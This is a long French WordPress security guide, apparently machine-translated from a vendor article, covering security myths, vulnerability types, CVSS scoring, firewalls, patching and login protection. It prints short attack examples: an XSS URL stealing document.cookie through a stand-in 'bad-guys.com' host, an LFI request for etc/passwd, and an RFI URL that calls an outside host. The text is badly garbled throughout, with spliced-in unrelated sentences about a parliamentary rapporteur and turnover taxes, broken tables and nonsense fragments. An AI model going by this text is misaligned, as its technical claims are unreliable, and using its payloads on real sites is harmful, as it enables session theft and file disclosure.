La sécurité de WordPress peut être intimidante, mais pas nécessairement. Dans ce guide complet de sécurité WordPress, nous avons simplifié les bases de la protection des sites WordPress afin que tout non – technicien puisse comprendre et protéger ses sites contre les pirates informatiques. Ce guide de sécurité WordPress est divisé en 10 sections faciles à comprendre. Chaque section vous guidera sur des aspects spécifiques de la sécurité WordPress. À la fin de ce guide, vous découvrirez les différents types de vulnérabilités, les raisons du piratage et tout sur la façon de protéger les utilisateurs individuels, du serveur au site WordPress.
Plongeons! Section 1 de ce guide: WordPress est – il sûr? WordPress est – il sûr? En bref, la réponse est oui. WordPress représente près de 40% de tous les sites Internet. L’une des principales raisons de la popularité de WordPress est qu’il s’agit d’une plateforme très sécurisée pour créer tout, des blogs aux grands magasins de commerce électronique. Y a – t – il des problèmes de sécurité avec wordpress? Bien que WordPress lui – même soit sûr, éviter les erreurs de sécurité de WordPress nécessite un peu d’effort de la part du propriétaire du site. En fait, le plus gros problème de sécurité de WordPress est ses utilisateurs. Le propriétaire du site peut éviter la plupart des attaques de piratage WordPress sur la plateforme avec un peu d’effort.
Ne t’inquiète pas, on va te protéger. Ce guide vous apprendra tout ce dont vous avez besoin pour protéger votre site Web. Il y a cinq choses que nous devons savoir avant de protéger notre site. Pourquoi les pirates informatiques attaquent – ils différents types de sites WordPress pirates informatiques types spécifiques de vulnérabilités WordPress comment empêcher les vulnérabilités WordPress comment déterminer la gravité de la vulnérabilité pourquoi les pirates informatiques devraient – ils attaquer mon site Web? C’est un problème de sécurité WordPress commun que vous pouvez résoudre dans le pire des cas
Je voudrais remercier le Rapporteur pour son excellent rapport. Cela ne signifie toutefois pas que tout le monde le fasse légalement et moralement. Même les plus petits sites Web, les hackers font des profits élevés. L’argent est tout ce dont ils ont besoin, mais certaines personnes apprécient le sentiment de pouvoir qu’elles ont acquis lorsqu’elles ont violé avec succès un site Web, mais la grande majorité des gens font des affaires uniquement pour de l’argent. Section 2: Découvrez quelques mythes de sécurité WordPress avant de continuer à lire le reste de ce guide de sécurité WordPress.
Vous trouverez beaucoup de conseils de sécurité WordPress qui circulent sur Internet, de la part de personnes bien intentionnées qui veulent vraiment vous aider. Malheureusement, certaines de ces astuces sont basées sur le mythe de sécurité de WordPress et n’ajoutent pratiquement aucune sécurité supplémentaire au site WordPress. En effet, certains \
La fréquence est mentionnée comme un mythe. Nombre de maux de tête causés par les mythes. Le mythe donne un faux sentiment de sécurité. Vous devriez cacher votre administrateur URL \ WP ou votre login \ WP (également connu sous le nom de cache Backend). L’idée derrière cacher un administrateur Wp est que les pirates informatiques ne peuvent pas déchiffrer ce qu’ils ne peuvent pas trouver. Si votre URL de connexion n’est pas une URL WordPress standard \ WP admin \, n’êtes – vous pas vulnérable à la violence? En fait, la plupart des caractéristiques de l’arrière – plan caché sont
Et le thème parfait et le numéro de version WordPress. Cependant, il y a des robots sans cerveau qui cherchent sur Internet des vulnérabilités connues dans le Code réel qui fonctionne sur votre site, de sorte que cacher le nom du sujet et le numéro de version WP ne vous protégera pas. 3. Vous devriez renommer votre répertoire de contenu WP le Répertoire de contenu WP contient vos plug – ins, sujets et dossiers de téléchargement de médias. Il y a beaucoup de bonnes choses et de code exécutable dans un répertoire, donc il est compréhensible que les gens veulent prendre l’initiative de protéger ce dossier. Malheureusement, changer le nom du contenu WP ajoutera une couche de sécurité supplémentaire au site, ce qui est le mythe de sécurité de WordPress. Il ne le fera pas. Nous pouvons facilement trouver le nom du Répertoire de contenu WP modifié en utilisant les outils de développement de navigateur. Dans la capture d’écran ci – dessous, nous pouvons voir que j’ai renommé le Répertoire de contenu de ce site Web en \ test \.
Votre site Web sera l’un des millions de sites Web les plus visités chaque mois. De nombreux hackers attaquent votre site dans l’intention de l’infecter avec des logiciels malveillants. Les logiciels malveillants sont de petits morceaux de code qui peuvent être utilisés pour apporter des changements malveillants à un site Web. Si votre site Web est infecté par des logiciels malveillants, il est important d’être informé dès que possible. Chaque minute qu’un logiciel malveillant reste sur votre site, il peut causer plus de dommages à votre site. Plus le site est endommagé, plus il faut de temps pour le nettoyer et le restaurer. Il est essentiel de vérifier la santé du site Web en scannant régulièrement les logiciels malveillants. C’est pourquoi il est essentiel de continuer à vérifier l’état de santé du site Web en scannant les logiciels malveillants. Un hacker de ransomware pourrait vouloir attaquer votre site Web pour obtenir ransomware. Le ransomware signifie que lorsque le hacker contrôle votre site, il ne vous sera pas publié à moins que vous ne payiez des frais élevés. Le temps d’arrêt moyen pour les attaques de ransomware est de 9,5 jours. Combien cela vous coûtera – t – il de ne pas vendre pendant 10 jours? La rançon moyenne demandée par les pirates informatiques a fortement augmenté, passant de 294 $en 2015 à plus de 13 000 $en 2020. Grâce à ce mode de paiement, la criminalité en ligne n’a pas ralenti. Au fur et à mesure que ces communautés criminelles se développent, il devient de plus en plus important de protéger et de protéger adéquatement votre site Web. 4. Site corrompu certains hackers peuvent attaquer votre site pour le plaisir. Un piratage qui n’est pas si diabolique par nature est un site de diffamation. Ce sont généralement des enfants ou des jeunes qui commencent tout juste à jouer au piratage. Ils l’ont fait pour
Un hacker peut être utilisé pour effectuer des entrées malveillantes. Gardez à l’esprit que les hackers Web sont presque toujours automatisés. Pour cette raison, les hackers peuvent facilement accéder à un grand nombre de sites Web, presque en un clin d’oeil. Les hackers utilisent des outils spéciaux pour scanner les vulnérabilités connues sur Internet. Les hackers aiment les cibles faciles à attaquer, et avoir un site Web avec un logiciel qui exécute des vulnérabilités connues est comme donner aux hackers des instructions étape par étape pour accéder à votre site WordPress, serveur, ordinateur ou tout autre appareil connecté à Internet. Notre rapport mensuel de collecte des vulnérabilités WordPress couvre toutes les vulnérabilités dans WordPress Core, les plug – ins WordPress et les sujets de divulgation publique. Dans ces collections, nous partageons le nom du plug – in ou du sujet de vulnérabilité, la version touchée et le type de vulnérabilité. Qu’est – ce qu’une vulnérabilité de jour zéro? Une vulnérabilité de jour zéro est une vulnérabilité qui est divulguée publiquement avant qu’un développeur ne publie un correctif de vulnérabilité. En parlant de sécurité WordPress, il est important de comprendre la définition de la vulnérabilité de jour zéro. Comme la vulnérabilité a été divulguée au public, les développeurs n’ont pas eu le temps de la corriger. Cela a une grande influence sur votre plug – in et votre thème. Souvent, les chercheurs en sécurité découvrent les vulnérabilités et les divulguent en privé aux développeurs de l’entreprise qui possèdent le logiciel. Les chercheurs et les développeurs en sécurité conviennent que des détails complets seront publiés dès que le correctif sera disponible. Après la publication du correctif, la divulgation de la vulnérabilité peut être légèrement retardée afin de donner à un plus grand nombre de personnes le temps de mettre à jour les principales vulnérabilités en matière de sécurité. Cependant, si le développeur ne répond pas au chercheur
En ce qui concerne la sécurité ou l’absence de correctifs de vulnérabilité, les chercheurs peuvent divulguer publiquement des vulnérabilités afin de faire pression sur les développeurs pour qu’ils publient des correctifs. La divulgation publique des vulnérabilités et l’introduction apparente d’une journée zéro pourraient être contre – productives. Mais c’est le seul moyen pour les chercheurs de faire pression sur les développeurs pour qu’ils corrigent les bogues. Le projet zéro de Google a des lignes directrices similaires pour l’exposition aux vulnérabilités. Ils ont publié tous les détails de la fuite 90 jours plus tard. Si la vulnérabilité a été corrigée. N’importe qui peut le découvrir. Si un hacker découvre une vulnérabilité avant que le développeur ne publie le correctif, ce sera le pire cauchemar de l’utilisateur final… Zéro jour utilisé activement. Qu’est – ce qu’une vulnérabilité de jour zéro activement exploitée? Une vulnérabilité de jour zéro activement exploitée est ce à quoi elle ressemble. Il s’agit d’une vulnérabilité non corrigée que les pirates informatiques peuvent cibler, exploiter et exploiter activement. À la fin de 2018, les pirates informatiques exploitent activement de graves vulnérabilités WordPress dans le plug – in de conformité WP gdpr. Cette vulnérabilité permet aux utilisateurs non autorisés de modifier les paramètres d’inscription des utilisateurs du WP et de changer le nouveau rôle d’utilisateur par défaut de l’abonné à l’Administrateur, comme décrit dans la section suivante. Ces hackers ont découvert cette vulnérabilité avant le plug – in de conformité WP gdpr et les chercheurs en sécurité. Par conséquent, tout site Web qui a installé le plugin est une marque de commerce simple et garantie pour les cybercriminels. La meilleure façon de se protéger contre une vulnérabilité de jour zéro la meilleure façon de protéger un site Web contre une vulnérabilité de jour zéro est de désactiver et de supprimer le logiciel jusqu’à ce que la vulnérabilité soit corrigée. Heureusement, les développeurs du plug – in de conformité WP gdpr ont
Le lendemain de sa divulgation, il a rapidement publié un correctif pour cette vulnérabilité. Une vulnérabilité sans correctif rend votre site facile à cibler par des pirates informatiques. Vulnérabilité WordPress non validée et validée lorsque vous parlez de vulnérabilité WordPress, vous devez également comprendre deux autres termes. Non authentifié: une vulnérabilité WordPress non authentifiée signifie que n’importe qui peut l’exploiter. Vérifié: une vulnérabilité WordPress validée signifie qu’un utilisateur connecté est nécessaire pour exploiter cette vulnérabilité. Il est difficile pour un hacker d’exploiter une vulnérabilité qui nécessite un utilisateur authentifié, en particulier une vulnérabilité qui nécessite des privilèges d’administrateur. De plus, si un hacker possède déjà un ensemble d’identifiants d’administrateur, il n’a pas vraiment besoin d’exploiter la vulnérabilité pour créer de la confusion. Il y a un avertissement. Certaines vulnérabilités authentifiées n’ont besoin que d’exploiter la fonctionnalité au niveau de l’abonné. Si votre site permet à quelqu’un de s’inscrire, il n’y a pas beaucoup de différence entre cette vulnérabilité et une vulnérabilité non vérifiée. En parlant de vulnérabilité WordPress, il y a 21 types communs de vulnérabilité. Nous avons introduit chaque type de vulnérabilité WordPress. La vulnérabilité de contournement d’authentification permet à un attaquant de contourner les exigences d’authentification et d’exécuter des tâches qui sont généralement réservées aux utilisateurs authentifiés. L’authentification est le processus d’authentification de l’utilisateur. WordPress exige des utilisateurs qu’ils saisissent un nom d’utilisateur et un mot de passe pour s’authentifier. Contournement de l’authentification l’exemple d’application valide l’authentification en fonction d’un ensemble fixe de paramètres. Un attaquant peut modifier ces paramètres pour accéder à ce qui est normalement nécessaire
Les scripts croisés réfléchissants se produisent lorsqu’un script malveillant est envoyé au serveur dans une demande du client (une demande de l’utilisateur dans le navigateur), réfléchi par le serveur et exécuté par le navigateur. Supposons que votre favesite soit un exemple de réflexion de script inter – site. Com demande l’accès à certains contenus du site. Supposons que ce site n’encode pas correctement l’entrée de l’utilisateur. Un attaquant peut exploiter cette vulnérabilité en créant un lien malveillant et en le partageant avec un utilisateur de votre site. Courriels et messages sur les médias sociaux. Je suis ton préféré. L’outil com \ Cool attaqué utilise l’outil de raccourcissement d’URL pour rendre les liens malveillants non menaçants et très cliquables, yourfavesite. Com \ cool things. Cependant, lorsque vous cliquez sur le lien raccourci, le lien complet s’exécute à partir de votre navigateur de site. Com \ cool things? Q = quelque chose de cool
Basé sur Dom en envoyant l’URL suivante au nouvel utilisateur: http:\\yourfavesite.com\account?name= Alertes (document.cookie) Lorsque le nouvel utilisateur clique sur le lien, le navigateur envoie une demande: \ Account? Nom = Alertes (document.cookie) Un méchant. Com. Le site répondra en utilisant la page contenant le code JavaScript ci – dessus. Le navigateur du nouvel utilisateur crée un objet Dom pour la page qui contient des objets de document. L’emplacement contient une chaîne: http:\\www.bad-guys.com\account?name= Alertes (document.cookie)
Période Exemples d’escalade des privilèges dans notre résumé de vulnérabilité WordPress de novembre 2020, nous signalons une vulnérabilité d’escalade des privilèges trouvée dans le plug – in membre final (qui a été corrigé dans la version 2.1.12). Un attaquant peut fournir des paramètres de tableau pour les éléments utilisateurs de la capacité wp \ u qui définissent le rôle de l’utilisateur. Au cours du processus d’inscription, les détails d’inscription soumis sont transmis à la fonction Update _ profile et toutes les métadonnées soumises, peu importe ce qui est envoyé, sont mises à jour pour les utilisateurs nouvellement enregistrés. Cette vulnérabilité permet essentiellement aux nouveaux utilisateurs de demander à un administrateur pendant leur inscription. Comment empêcher la mise à jour des permissions ithemes Security pro peut aider à protéger votre site contre les contrôles d’accès corrompus en limitant l’accès des administrateurs à la liste des périphériques de confiance. Vulnérabilité d’exécution de code à distance RCE ou vulnérabilité d’exécution de code à distance permet à un attaquant d’accéder et de modifier, voire de contrôler un ordinateur ou un serveur. Exemple d’exécution de code à distance en 2018, Microsoft a découvert une vulnérabilité d’exécution de code à distance dans Excel. En exploitant avec succès cette vulnérabilité, un attaquant peut exécuter du Code arbitraire dans le contexte de l’utilisateur actuel. Si l’utilisateur actuel est connecté avec des privilèges d’utilisateur administratifs, un attaquant peut prendre le contrôle du système affecté. L’attaquant peut alors installer le programme; Afficher, modifier ou supprimer des données; Ou créer un nouveau compte avec des privilèges d’utilisateur complets. Les utilisateurs dont les comptes sont configurés pour avoir moins de privilèges d’utilisateur sur le système peuvent être moins touchés que les utilisateurs suivants:
La Commission a également adopté une proposition de directive qui est à peu près identique à la législation des États Membres en matière de taxes sur le chiffre d’affaires. La façon la plus simple d’éviter l’exécution de code à distance pour atténuer la vulnérabilité RCE est de valider l’entrée de l’utilisateur en filtrant et en supprimant les caractères indésirables. Notre société mère, Liquid Web, a un article sur la prévention de l’exécution de code à distance. Vulnérabilité à l’inclusion de fichiers une vulnérabilité à l’inclusion de fichiers se produit lorsqu’une application Web permet à un utilisateur d’envoyer des entrées à un fichier ou de télécharger un fichier sur un serveur. Il existe deux types de fichiers qui contiennent des vulnérabilités, locales et distantes. Vulnérabilité d’inclusion de fichiers locaux LFI ou vulnérabilité d’inclusion de fichiers locaux permet à un attaquant de lire et parfois d’exécuter des fichiers sur un serveur de site Web. Un exemple d’inclusion d’un fichier local nous amène à votre site Web. Com, où le chemin passé à l’instruction contenant n’est pas nettoyé correctement. Par exemple, regardons l’URL ci – dessous. Yourfavesite. Com \ module. Php? Fichier = exemple. Un attaquant de fichier peut modifier les paramètres d’URL pour accéder à des fichiers arbitraires sur le serveur. Yourfavesite. Com \ module. Php? File = etc \ passwd changer la valeur du fichier dans l’URL pourrait permettre à un attaquant de voir le contenu du fichier psswd. Comment empêcher l’inclusion d’une liste de fichiers autorisés que la page de création de fichiers locaux peut contenir, puis utiliser un identificateur pour accéder au fichier sélectionné. Toute demande contenant un identificateur invalide est ensuite bloquée. Vulnérabilité d’inclusion de fichiers distants RFI ou vulnérabilité d’inclusion de fichiers distants permet à un attaquant d’inclure des fichiers, généralement en exploitant le mécanisme d’inclusion de fichiers dynamiques mis en œuvre dans l’application cible. Fichiers distants avec spritz désactivés dans le dépôt contenant des exemples de plug – ins WP WordPress
Tolly Word Press. Org, parce qu’il a une vulnérabilité RFI. Voici le code source de la vulnérabilité: if (isset ($u Get [‘URL]) {$content = File _ get Contents ($u Get [‘ URL]); vous pouvez l’exploiter en modifiant la valeur de content.filter.php? Url = value. Exemple: yoursite.com \ \ WP content \ plugins \ WP with spritz \ wp.spritz.content.filter.php? Url = http Http: \ \ Bad gues. Empêche com \ exec qui contient des fichiers distants de créer une liste de fichiers autorisés que la page peut contenir, puis d’accéder au fichier sélectionné en utilisant un identificateur. Toute demande contenant un identificateur invalide est ensuite bloquée. Une vulnérabilité de traversée de répertoire ou de fichier permet à un attaquant de lire des fichiers arbitraires sur le serveur exécutant l’application. Échantillons croisés de répertoires les versions 5.7 à 5.03 de WordPress sont vulnérables aux attaques croisées de répertoires parce qu’elles ne valident pas correctement les données d’entrée de l’utilisateur. Un attaquant accédant à un compte avec au moins les privilèges d’auteur peut exploiter une vulnérabilité de traversée de répertoire et exécuter du Code PHP malveillant sur le serveur sous – jacent pour une capture à distance complète. Comment empêcher les développeurs croisés de répertoires d’utiliser des index au lieu de la partie réelle du nom de fichier lors de la création de modèles ou d’utiliser des fichiers de langue. Vulnérabilité de redirection malveillante une vulnérabilité de redirection malveillante permet à un attaquant d’injecter du Code pour rediriger un visiteur de site Web vers un autre site Web. L’exemple de redirection malveillante suppose que vous êtes à la recherche d’un pull bleu dans une boutique en ligne à l’aide d’un outil de recherche. Malheureusement, le serveur boutique ne peut pas encoder correctement l’entrée de l’utilisateur et
Octets \ sec. Il existe deux façons principales de prévenir les attaques par déni de service et d’atténuer les attaques dos. Achetez plus d’hôtes que vous n’en avez besoin. Avoir des ressources supplémentaires peut vous aider à surmonter la croissance de la demande causée par les attaques dos. Utilisez un pare – feu au niveau du serveur, comme cloudflare. Un pare – feu peut détecter des pointes anormales de trafic et empêcher la surcharge du site. Enregistrement des touches l’enregistrement des touches est également appelé enregistrement du clavier ou acquisition du clavier. L’enregistrement des touches se produit lorsque le hacker surveille et enregistre secrètement les touches pressées par les visiteurs du site. Exemple d’enregistrement de keysequence en 2017, un hacker a installé avec succès un JavaScript malveillant sur le serveur du fabricant de smartphones oneplus. Un attaquant utilise du Code malveillant pour surveiller et enregistrer les clés du client oneplus lorsqu’il entre les détails de la carte de crédit. Avant qu’oneplus ne détecte et répare les attaques de pirates informatiques, les pirates informatiques ont enregistré et recueilli des informations clés sur 40 000 clients. Comment empêcher la mise à jour complète de l’enregistrement de la chaîne de clés! En général, un attaquant doit utiliser une autre vulnérabilité existante pour insérer un enregistreur de clavier dans un ordinateur ou un serveur. La mise à jour de tout le contenu avec les derniers correctifs de sécurité évitera de donner aux pirates un moyen facile d’installer un Keylogger sur votre site Web ou votre ordinateur. Avantage: la vulnérabilité du logiciel d’Hameçonnage est la seule vulnérabilité que les pirates informatiques et les cybercriminels tentent d’exploiter. Les hackers ciblent également les humains et les utilisent pour attaquer. Une utilisation courante est l’hameçonnage. Qu’est – ce que l’hameçonnage? L’hameçonnage est une méthode d’attaque en ligne qui utilise le courriel, les médias sociaux, les messages texte et le téléphone pour tromper les victimes en leur fournissant des renseignements personnels. L’attaquant utilisera ensuite ces informations pour accéder à un compte personnel ou
Fraude à l’identité. Comment détecter les courriels d’hameçonnage comme nous l’avons vu précédemment dans cet article, certaines vulnérabilités nécessitent un certain type d’interaction utilisateur pour être exploitées. Une façon pour les hackers d’attirer les gens dans leurs activités maléfiques est d’envoyer des e – mails d’hameçonnage. Apprenez à identifier les courriels d’hameçonnage pour éviter de participer involontairement à des programmes de cybercriminels. 4 conseils pour détecter les courriels d’hameçonnage: voir l’adresse électronique de l’expéditeur: Si vous recevez un courriel d’une entreprise, la partie de l’adresse électronique de l’expéditeur qui suit « @ » doit correspondre au nom de l’entreprise. Si un courriel représente une entreprise ou une entité gouvernementale, mais utilise une adresse électronique publique comme « @ gmail », il s’agit d’un courriel d’hameçonnage. Notez les petites erreurs d’orthographe dans le nom de domaine. Par exemple, regardons cette adresse e – mail [protégée par e – mail] et nous pouvons voir que Netflix a un \
Déterminer l’utilisateur en fonction de la nécessité d’exploiter l’interaction utilisateur pour la vulnérabilité. Si l’interaction utilisateur n’est pas nécessaire pour permettre à un attaquant d’exploiter la vulnérabilité, elle est plus élevée.
Demande Pour exploiter correctement cette vulnérabilité, l’utilisateur doit prendre certaines mesures avant de l’exploiter, par exemple en le persuadant de cliquer sur un lien dans un courriel. 1.1.5. Les scores de portée sont basés sur les vulnérabilités des composants logiciels qui ont une incidence sur les ressources en dehors de leur portée de sécurité. La portée de la sécurité comprend d’autres composants qui ne fournissent que des fonctions à ce composant, même s’ils ont leurs propres permissions de sécurité. Les scores sont plus élevés lorsque la plage change. Description de l’utilisation Pas de changement Les vulnérabilités exploitées ne peuvent affecter que les ressources gérées par la même institution. Dans ce cas, les parties vulnérables et touchées coïncident. <!DOCTYPE foo [ Modifié
Incidence sur la description de la confidentialité | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Perte totale de confidentialité, entraînant Divulguer toutes les ressources du logiciel attaqué à l’attaquant. | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Une certaine perte de confidentialité. Un attaquant peut accéder à des informations confidentielles. | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
La confidentialité n’est pas perdue dans le logiciel utilisé. | 1.2.2. Intégrité (Io) ce score d’intégrité est basé sur l’impact d’une exploitation réussie sur l’intégrité. Plus les conséquences du logiciel touché sont importantes, plus le score est élevé. | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Perte totale d’intégrité ou perte totale de protection. | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
La modification des données n’aura pas d’impact direct important sur le logiciel touché. | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Impact sur la description de la disponibilité | |||||||||||||||||||||||||||||||||||||||||||||||||||
Une perte totale de disponibilité entraîne un déni total d’accès aux ressources du logiciel attaqué. | |||||||||||||||||||||||||||||||||||||||||||||||||||
Réduction du rendement ou interruption de la disponibilité des ressources. | |||||||||||||||||||||||||||||||||||||||||||||||||||
Valeur d’expiration décrite par Code | |||||||||||||||||||||||||||||||||||||||||||
L’attribution de cette valeur à une mesure n’affecte pas les scores. C’est un signal que la formule de notation saute cet indicateur. | |||||||||||||||||||||||||||||||||||||||||||
Non défini (CR: x) | La perte (confidentialité \ intégrité \ disponibilité) peut avoir un impact limité sur l’Organisation. | ||||||||||||||||||||||||||||||||||
Faible (CR: l) | Le risque de perte (confidentialité \ intégrité \ disponibilité) a de graves répercussions sur l’Organisation. | ||||||||||||||||||||||||||||||||||
Élevé (CR: h) | |||||||||||||||||||||||
Calcul des scores cvss environnementaux les scores environnementaux sont définis comme si (score d’impact modifié) | |||||||||||||||||||||||
0 | Il n’y en a pas. | ||||||||||||||||||||||
4,0 – 6,9 | |||||||||||
7,0 – 8,9 | |||||||||||
9,0 – 10,0 | |||||||||||
3 méthodes de mise en oeuvre du WAF il existe trois méthodes différentes de mise en oeuvre du WAF. Examinons les avantages et les inconvénients de chaque type. WAF basé sur le réseau: les WAF physiques ou basés sur le réseau sont basés sur le matériel. Le principal avantage du WAF basé sur le réseau est la faible latence due à l’installation locale. Toutefois, les inconvénients découlent des prix d’entreposage et d’entretien du matériel. Les prix et les exigences de stockage physique font que la plupart des gens font de mauvais choix. WAF basé sur l’hôte: WAF basé sur l’hôte ou local intégré dans WordPress, généralement en utilisant des plug – ins. L’avantage du WAF basé sur l’hôte est qu’il est moins cher que le WAF basé sur le réseau. Avantage d G les correctifs de routine et de sécurité publiés par Microsoft le deuxième mardi de chaque mois. Microsoft a publié des correctifs de sécurité sur une base aussi fiable, ce qui est fantastique. Patch est également le jour où Microsoft patch divulgue publiquement des vulnérabilités en matière de sécurité mardi. Consultez le contenu à mettre à jour dans le Guide de sécurité ultime de WordPress 2020 ebook et comment mettre à jour automatiquement pour savoir comment appliquer automatiquement les mises à jour de mardi. Le mercredi suivant la sortie du correctif de mardi, de nombreux attaquants sont généralement vus exploiter une vulnérabilité précédemment connue sur un système obsolète sans correctif. Par conséquent, le mercredi du prochain patch a été officiellement nommé mercredi de la vulnérabilité. Pourquoi un hacker vise – t – il une vulnérabilité corrigée? Les hackers visent à corriger les vulnérabilités parce qu’ils savent que les gens ne les mettront pas à jour (y compris les plug – ins et les sujets sur le site). La divulgation publique des vulnérabilités le jour de l’application du correctif est une norme de l’industrie. Une fois qu’une vulnérabilité est divulguée publiquement, elle devient une « vulnérabilité connue » dans une version obsolète et non corrigée du logiciel. Les logiciels présentant des vulnérabilités connues peuvent facilement être ciblés par des pirates informatiques. Les hackers aiment les cibles faciles à attaquer et les logiciels avec des vulnérabilités connues sont comme des instructions étape par étape pour les hackers d’accéder à votre site WordPress, serveur, ordinateur ou tout autre appareil connecté à Internet. Divulgation responsable vous pouvez vous demander pourquoi une vulnérabilité peut se produire si elle offre une occasion d’attaque à un hacker. Eh bien, il est courant que les chercheurs en sécurité découvrent les vulnérabilités en privé et les signalent aux développeurs de logiciels. Sous réserve d’une divulgation responsable, l’étude initiale sera présentée en privé à: Public Mais, comme l’attaque de mercredi, le hacker a verrouillé la vulnérabilité même si un correctif a été publié. Dans les jours et les semaines qui ont suivi la divulgation de la vulnérabilité de conformité de WP gdpr, nous avons reçu un grand nombre de rapports selon lesquels le site WordPress a été compromis par des attaquants qui exploitent cette vulnérabilité. Le principal coupable de la corruption du site WordPress est un plugin ou un thème vulnérable avec des correctifs disponibles mais non appliqués. Questo Kos frossrant!!!!! Cela signifie que la plupart des hackers WP peuvent être arrêtés. Il est choquant de penser à ceux qui ont dépensé beaucoup d’argent pour nettoyer le site, aux revenus qu’ils ont perdus pendant qu’il était inactif, et aux revenus futurs qu’ils ont perdus en perdant la confiance de leurs clients. Vous serez encore plus choqué quand vous saurez que toute cette douleur peut être évitée par une simple mise à jour. Les fonctionnalités de gestion de version d’ithemes Security pro vous permettent de personnaliser et de mettre à jour automatiquement WordPress. Le suivi des vulnérabilités WordPress garder les plug – ins et les thèmes à jour ne vous protégera pas contre chaque vulnérabilité WordPress. Certains plugins et thèmes WordPress ont été abandonnés par les développeurs qui les ont créés. Malheureusement, si un plug – in ou un thème obsolète a une vulnérabilité, il ne recevra jamais de correctif. Les pirates cibleront les sites Web qui utilisent ces plug – ins qui sont maintenant vulnérables de façon permanente. Une vulnérabilité de suivi est la différence entre avoir un site Web sécurisé et un site Web facilement accessible aux pirates informatiques. Si vous avez un plug – in obsolète avec une vulnérabilité connue sur votre site, vous fournissez aux pirates informatiques les éléments dont ils ont besoin pour contrôler votre site. C’est pourquoi vous devez suivre toutes les dernières vulnérabilités Utilisateurs légitimes. 2. Limitez les tentatives d’authentification externe en demandant qu’il y ait d’autres façons de vous connecter à WordPress en plus d’utiliser le formulaire de connexion. Avec XML – RPC, un attaquant peut effectuer des centaines de tentatives de nom d’utilisateur et de mot de passe dans une seule requête HTTP. La méthode d’amplification violente permet à un attaquant d’utiliser XML – RPC pour des milliers de tentatives de nom d’utilisateur et de mot de passe dans plusieurs requêtes http. En utilisant wordpress pour ajuster les paramètres d’ithemes Security pro, vous pouvez bloquer plusieurs tentatives d’authentification par demande XML – RPC. Limiter le nombre de tentatives de nom d’utilisateur et de mot de passe à une par demande protégera grandement votre accès à WordPress. | 3. La restriction de l’accès à la protection contre la violence en ligne concerne la protection contre la violence locale. La protection contre la violence locale ne vérifie que les tentatives d’accès à votre site et interdit les utilisateurs en fonction des règles de blocage spécifiées dans vos paramètres de sécurité. La protection contre la cyberviolence va encore plus loin. Le réseau est une communauté sécurisée d’themes avec plus d’un million de sites Web. Si l’IP est trouvée en tentant d’accéder au site Web de la communauté de sécurité d’Themes, elle est ajoutée à la liste des voleurs de réseau de Bruce force. Une fois qu’une IP est inscrite sur la liste d’interdiction de la violence sur Internet, elle est bloquée sur tous les sites du réseau. Par conséquent, si une IP attaque mon site Web et est interdite, elle sera signalée au réseau de violence de sécurité themes. Mon rapport peut aider à désactiver l’IP sur le réseau. J’aime aider à protéger l’accès WordPress des autres en activant simplement la protection réseau sécurisée d’themes. Pour commencer à utiliser la protection de la force réseau, activez – la sur la page d’accueil des paramètres de sécurité. | Puis entrez votre adresse E – mail, sélectionnez si vous souhaitez recevoir des mises à jour par e – mail, puis cliquez sur le bouton Enregistrer. | |
Lorsque vous activez les nouveaux paramètres de périphérique de confiance, les utilisateurs sont informés des périphériques en attente non reconnus dans la barre d’administration WordPress. Si l’appareil actuel n’a pas été ajouté à la liste des appareils de confiance, cliquez sur le lien confirmer cet appareil pour envoyer un courriel d’autorisation. | Cliquez sur le bouton confirmer l’appareil dans un courriel de connexion non reconnu pour ajouter l’appareil actuel à la liste des appareils de confiance. | L’accessibilité de la page d’atterrissage WordPress en fait la partie la plus vulnérable et potentiellement vulnérable de tout site WordPress. Cependant, l’utilisation des étapes de cette section rendra votre accès WordPress presque impénétrable. S Exécuter sur notre site Web. La bonne nouvelle, c’est que la plupart des attaques contre les comptes utilisateurs de WordPress peuvent être évitées avec un peu d’effort de votre part. Voyons ce que vous pouvez faire pour protéger vos utilisateurs de WordPress. En effet, ces méthodes de sécurité WordPress aideront à protéger n’importe quel type d’utilisateur WordPress. Cependant, lorsque nous examinons chaque méthode, nous vous faisons savoir quels utilisateurs devraient être nécessaires pour l’utiliser. 1. La façon la plus simple de protéger le site Web en ne fournissant aux utilisateurs que les fonctions dont ils ont besoin est de ne fournir aux utilisateurs que les fonctions dont ils ont besoin et non d’autres fonctions. Si la seule chose que quelqu’un fera sur votre site est de créer et d’éditer son propre billet de blog, alors vous n’avez pas besoin d’éditer le billet de quelqu’un d’autre. 2. Dans la liste compilée par Splash Data, les utilisateurs de WordPress sont protégés par des mots de passe complexes. Le mot de passe le plus courant dans toutes les décharges de données est 123456. Data dump est une base de données piratée contenant les mots de passe des utilisateurs téléchargés sur Internet. Si 123456 est le mot de passe le plus courant dans les décharges de données, pouvez – vous imaginer combien de personnes utilisent des mots de passe faibles sur votre site? Utiliser un code faible est comme essayer de fermer la porte avec un morceau de ruban adhésif. Il n’a jamais fallu beaucoup de temps aux hackers pour pénétrer brutalement le site en dehors des mots de passe faibles. Aujourd’hui, les pirates informatiques utilisent des cartes graphiques pour attaquer, et le temps nécessaire pour déchiffrer le mot de passe n’a jamais été réduit. Par exemple, regardons un diagramme créé par terahash, une entreprise de craquage de mot de passe haute performance. Leur graphique montre le temps nécessaire pour déchiffrer le mot de passe en utilisant le cluster 448x RTX 2080 Hash stack. | Par défaut, WordPress utilise le hachage MD5 pour stocker les mots de passe de l’utilisateur dans la base de données O chaque fois que vous visitez le site, une session WordPress génère un cookie de session. Supposons que votre extension de navigateur a été abandonnée par un développeur et que vous ne Publiez plus de mises à jour de sécurité. Malheureusement, les extensions de navigateur négligées ont une vulnérabilité. Cette vulnérabilité permet à un attaquant de détourner des cookies de navigateur, y compris les cookies de session WordPress mentionnés ci – dessus. Ce type de hacker est appelé détournement de session. Ainsi, un attaquant peut exploiter une vulnérabilité étendue pour monter votre connexion et commencer à apporter des modifications malveillantes à vos utilisateurs WordPress. Vous devriez fournir une protection contre les détournements de session aux administrateurs et aux éditeurs. La fonctionnalité des appareils de confiance dans themes Security pro fait du détournement de session un passé. Si l’appareil de l’utilisateur change pendant la session, Themes Security déconnecte automatiquement l’utilisateur afin d’empêcher toute activité non autorisée sur le compte de l’utilisateur, comme changer l’adresse e – mail de l’utilisateur ou télécharger un plug – in malveillant. 6. Chaque fois 